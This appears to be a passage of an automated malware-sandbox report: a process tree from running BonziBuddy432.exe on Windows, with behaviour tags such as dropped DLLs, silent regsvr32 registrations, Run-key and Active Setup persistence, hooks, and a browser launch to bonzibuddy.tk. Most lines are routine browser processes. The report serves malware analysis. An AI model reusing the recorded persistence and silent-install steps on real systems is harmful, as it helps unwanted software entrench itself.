  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5828,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=728 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:4116
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=1472,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6164 /prefetch:1
  2⤵
  PID:5768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=6228,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6696 /prefetch:1
  2⤵
  PID:5948
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=7072,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6708 /prefetch:1
  2⤵
  PID:4732
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=6940,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7124 /prefetch:1
  2⤵
  PID:1208
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --field-trial-handle=6976,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6820 /prefetch:1
  2⤵
  PID:5688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --field-trial-handle=3304,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5420 /prefetch:1
  2⤵
  PID:5400
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --field-trial-handle=7204,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7336 /prefetch:1
  2⤵
  PID:220
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=4940,i,4607461493105349612,3903930086688182211,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=7164 /prefetch:1
  2⤵
  PID:6116

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4612

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:4872

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:4696

C:\Users\Admin\AppData\Local\Temp\Temp1_Bon.zip\BonziBuddy432.exe
"C:\Users\Admin\AppData\Local\Temp\Temp1_Bon.zip\BonziBuddy432.exe"
1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1508
- C:\Windows\SysWOW64\cmd.exe
  C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\BonziBuddy432\Runtimes\CheckRuntimes.bat" "
  2⤵
  - System Location Discovery: System Language Discovery
  PID:6136
- - C:\Program Files (x86)\BonziBuddy432\Runtimes\MSAGENT.EXE
    MSAGENT.EXE
    3⤵
    - Boot or Logon Autostart Execution: Active Setup
    - Executes dropped EXE
    - Loads dropped DLL
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:5164
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s "C:\Windows\msagent\AgentCtl.dll"
      4⤵
      Loads dropped DLL
      Modifies registry class
      PID:5892
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s "C:\Windows\msagent\AgentDPv.dll"
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      Modifies registry class
      PID:2092
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s "C:\Windows\msagent\mslwvtts.dll"
      4⤵
      Loads dropped DLL
      PID:5916
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s "C:\Windows\msagent\AgentDP2.dll"
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:5932
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s "C:\Windows\msagent\AgentMPx.dll"
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:5088
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s "C:\Windows\msagent\AgentSR.dll"
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:2764
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s "C:\Windows\msagent\AgentPsh.dll"
      4⤵
      Loads dropped DLL
      PID:5992
  - - C:\Windows\msagent\AgentSvr.exe
      "C:\Windows\msagent\AgentSvr.exe" /regserver
      4⤵
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Modifies registry class
      Suspicious use of SetWindowsHookEx
      PID:5232
  - - C:\Windows\SysWOW64\grpconv.exe
      grpconv.exe -o
      4⤵
      System Location Discovery: System Language Discovery
      PID:652
- - C:\Program Files (x86)\BonziBuddy432\Runtimes\tv_enua.exe
    tv_enua.exe
    3⤵
    - Boot or Logon Autostart Execution: Active Setup
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Drops file in System32 directory
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious use of SetWindowsHookEx
    PID:5184
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s C:\Windows\lhsp\tv\tv_enua.dll
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:5884
  - - C:\Windows\SysWOW64\regsvr32.exe
      regsvr32 /s C:\Windows\lhsp\tv\tvenuax.dll
      4⤵
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:5916
  - - C:\Windows\SysWOW64\grpconv.exe
      grpconv.exe -o
      4⤵
      System Location Discovery: System Language Discovery
      PID:5932
- C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://bonzibuddy.tk/
  2⤵
  - Enumerates system info in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
  - Suspicious use of SendNotifyMessage
  PID:5336
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x124,0x128,0x12c,0x100,0x130,0x7fff785d46f8,0x7fff785d4708,0x7fff785d4718
    3⤵
    PID:5368
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2112,17824801297966458445,9236659927398841241,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2124 /prefetch:2
    3⤵
    PID:5676
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2112,17824801297966458445,9236659927398841241,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2200 /prefetch:3
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5584
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2112,17824801297966458445,9236659927398841241,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2700 /prefetch:8
    3⤵
    PID:5776
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,17824801297966458445,9236659927398841241,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3304 /prefetch:1
    3⤵
    PID:5928
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,17824801297966458445,9236659927398841241,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3324 /prefetch:1
    3⤵
    PID:5936
- - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,17824801297966458445,9236659927398841241,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4948 /prefetch:1
    3⤵
    PID:5592
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,17824801297966458445,9236659927398841241,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3728 /prefetch:8
    3⤵
    PID:5188
- - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2112,17824801297966458445,9236659927398841241,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3728 /prefetch:8
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:5352

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:5440

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:6056

C:\Program Files (x86)\BonziBuddy432\BonziBDY_4.EXE
"C:\Program Files (x86)\BonziBuddy432\BonziBDY_4.EXE"
1⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:5604

C:\Windows\msagent\AgentSvr.exe
C:\Windows\msagent\AgentSvr.exe -Embedding
1⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SendNotifyMessage
PID:3136

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x4a8 0x3cc
1⤵
PID:5596

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of SendNotifyMessage
PID:4628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x118,0x11c,0x120,0xf4,0x124,0x7fff704fcc40,0x7fff704fcc4c,0x7fff704fcc58
  2⤵
  PID:3928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2060,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2056 /prefetch:2
  2⤵
  PID:3672
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1880,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2096 /prefetch:3
  2⤵
  PID:4712
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2284,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2296 /prefetch:8
  2⤵
  PID:5080
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3172,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3192 /prefetch:1
  2⤵
  PID:5188
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3200,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3224 /prefetch:1
  2⤵
  PID:5924
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4580,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4576 /prefetch:1
  2⤵
  PID:1372
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4756,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4820 /prefetch:8
  2⤵
  PID:4844
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5044,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5056 /prefetch:8
  2⤵
  PID:6048
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5092,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5140 /prefetch:8
  2⤵
  PID:6016
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5168,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5060 /prefetch:8
  2⤵
  PID:4992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5116,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5304 /prefetch:8
  2⤵
  PID:3476
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5084,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5296 /prefetch:8
  2⤵
  PID:2324
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5216,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5252 /prefetch:2
  2⤵
  PID:4408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4472,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5376 /prefetch:1
  2⤵
  PID:5868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5356,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3232 /prefetch:1
  2⤵
  PID:4420
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=4820,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5180 /prefetch:1
  2⤵
  PID:2292
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=4760,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4508 /prefetch:1
  2⤵
  PID:3772
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=5664,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5680 /prefetch:1
  2⤵
  PID:5964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5780,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5888 /prefetch:1
  2⤵
  PID:4768
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=3220,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5472 /prefetch:8
  2⤵
  PID:1060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=5064,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5500 /prefetch:1
  2⤵
  PID:6132
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=6116,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6108 /prefetch:8
  2⤵
  PID:456
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=6104,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6092 /prefetch:1
  2⤵
  PID:3968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=6120,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5652 /prefetch:1
  2⤵
  PID:4128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --field-trial-handle=5324,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5256 /prefetch:1
  2⤵
  PID:2840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --field-trial-handle=5432,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6100 /prefetch:1
  2⤵
  PID:3608
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --field-trial-handle=3240,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3396 /prefetch:1
  2⤵
  PID:2372
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --field-trial-handle=5644,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5972 /prefetch:1
  2⤵
  PID:4568
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --field-trial-handle=3316,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5952 /prefetch:1
  2⤵
  PID:1620
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --field-trial-handle=5224,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5396 /prefetch:1
  2⤵
  PID:3688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=6136,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5488 /prefetch:8
  2⤵
  PID:1120
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5704,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6108 /prefetch:8
  2⤵
  PID:624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --field-trial-handle=5388,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6160 /prefetch:1
  2⤵
  PID:3264
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --field-trial-handle=6252,i,17974717108044324613,4368586998847355994,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6452 /prefetch:1
  2⤵
  PID:1228
- C:\Program Files\Google\Chrome\Application\chrome.exe
